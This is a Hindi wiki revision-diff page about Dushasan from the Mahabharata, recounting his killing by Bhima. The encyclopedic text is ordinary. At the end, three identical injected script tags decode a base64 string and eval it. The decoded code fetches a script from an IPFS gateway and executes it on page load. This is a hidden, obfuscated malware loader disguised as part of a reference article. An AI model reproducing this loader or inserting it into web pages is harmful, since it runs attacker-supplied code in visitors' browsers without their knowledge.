Difference between revisions of "दुशासन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "{{महाभारत2}}" to "")
 
(13 intermediate revisions by 8 users not shown)
Line 1: Line 1:
{{incomplete}}<br />
+
[[चित्र:Bhim-Dushasan.jpg|thumb|[[भीम (पांडव)|भीम]] द्वारा दु:शासन वध]]
 
*दु:शासन [[धृतराष्ट्र]] और [[गांधारी]] का पुत्र और [[दुर्योधन]] का भाई था।
 
*दु:शासन [[धृतराष्ट्र]] और [[गांधारी]] का पुत्र और [[दुर्योधन]] का भाई था।
 
'''दु:शासन वध'''<br />
 
'''दु:शासन वध'''<br />
 +
महाभारत के युद्ध में [[भीम (पांडव)|भीम]] और दु:शासन का भंयकर युद्ध हुआ। अंत में भीम की विजय हुई। भीम ने अपनी [[गदा]] से दु:शासन का सिर फोड़ दिया था। भीम ने घोर गर्जना के साथ कहा-'[[कौरव|कौरवों]] की सभा में रजस्वला [[द्रौपदी]] के केश खींचकर उसके वस्त्रों का अपहरण करने वाले दु:शासन! आज तेरा ख़ून पी लूंगा।' तदनंतर दु:शासन ने एक रथ से [[पृथ्वी देवी|पृथ्वी]] पर गिर जाने पर भी अपनी बांह उठाकर कहा, 'यही वह बांह है जिससे मैंने तुम सबके देखते हुए द्रौपदी के बाल खींचे थे।' भीम अत्यंत क्रुद्ध होकर दु:शासन पर कूद पड़ा। उसने उसकी उठी हुई बांह शरीर से उखाड़कर दूर फेंक दी, फिर उसकी छाती चीरकर लहू-पान करने लगा। भीम का भयानक रूप देख सैनिक-चित्रसेन के साथ भागने लगे। राजकुमार ने [[कर्ण]] के भाई चित्रसेन को बाणों से बींधकर मार डाला। <ref>[[महाभारत]], [[कर्ण पर्व महाभारत|कर्णपर्व]], अध्याय 83</ref>
  
महाभारत के युद्ध में [[भीम]] और दु:शासन का भंयकर युद्ध हुआ। अंत में भीम की विजय हुई। भीम ने अपनी गदा से दु:शासन का सिर फोड़ दिया था। भीम ने घोर गर्जना के साथ कहा-'[[कौरव|कौरवों]] की सभा में रजस्वला [[द्रौपदी]] के केश खींचकर उसके वस्त्रों का अपहरण करने वाले दु:शासन! आज तेरा ख़ून पी लूंगा।' तदनंतर दु:शासन ने एक रथ से [[पृथ्वी देवी|पृथ्वी]] पर गिर जाने पर भी अपनी बांह उठाकर कहा, 'यही वह बांह है जिससे मैंने तुम सबके देखते हुए द्रौपदी के बाल खींचे थे।' भीम अत्यंत क्रुद्ध होकर दु:शासन पर कूद पड़ा। उसने उसकी उठी हुई बांह शरीर से उखाड़कर दूर फेंक दी, फिर उसकी छाती चीरकर लहू-पान करने लगा। भीम का भयानक रूप देख सैनिक-चित्रसेन के साथ भागने लगे। राजकुमार ने [[कर्ण]] के भाई चित्रसेन को बाणों से बींधकर मार डाला। <ref>[[महाभारत]], [[कर्ण पर्व महाभारत|कर्णपर्व]], अध्याय 83</ref>
+
{{लेख प्रगति
 
+
|आधार=
==टीका-टिप्पणी==
+
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
<br />
 
<br />
==अन्य लिंक==
+
==संबंधित लेख==
{{महाभारत}}
+
{{महाभारत}}{{महाभारत युद्ध}}{{पौराणिक चरित्र}}  
{{महाभारत2}}
+
[[Category:पौराणिक चरित्र]]
 
[[Category:पौराणिक कोश]]
 
[[Category:पौराणिक कोश]]
 
[[Category:महाभारत]]
 
[[Category:महाभारत]]
 +
[[Category:प्रसिद्ध चरित्र और मिथक कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:53, 31 May 2016

[[chitr:Bhim-Dushasan.jpg|thumb|bhim dvara du:shasan vadh]]

du:shasan vadh
mahabharat ke yuddh mean bhim aur du:shasan ka bhanyakar yuddh hua. aant mean bhim ki vijay huee. bhim ne apani gada se du:shasan ka sir pho d diya tha. bhim ne ghor garjana ke sath kaha-'kauravoan ki sabha mean rajasvala draupadi ke kesh khianchakar usake vastroan ka apaharan karane vale du:shasan! aj tera khoon pi looanga.' tadanantar du:shasan ne ek rath se prithvi par gir jane par bhi apani baanh uthakar kaha, 'yahi vah baanh hai jisase maianne tum sabake dekhate hue draupadi ke bal khianche the.' bhim atyant kruddh hokar du:shasan par kood p da. usane usaki uthi huee baanh sharir se ukha dakar door pheank di, phir usaki chhati chirakar lahoo-pan karane laga. bhim ka bhayanak roop dekh sainik-chitrasen ke sath bhagane lage. rajakumar ne karn ke bhaee chitrasen ko banoan se biandhakar mar dala. [1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. mahabharat, karnaparv, adhyay 83


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>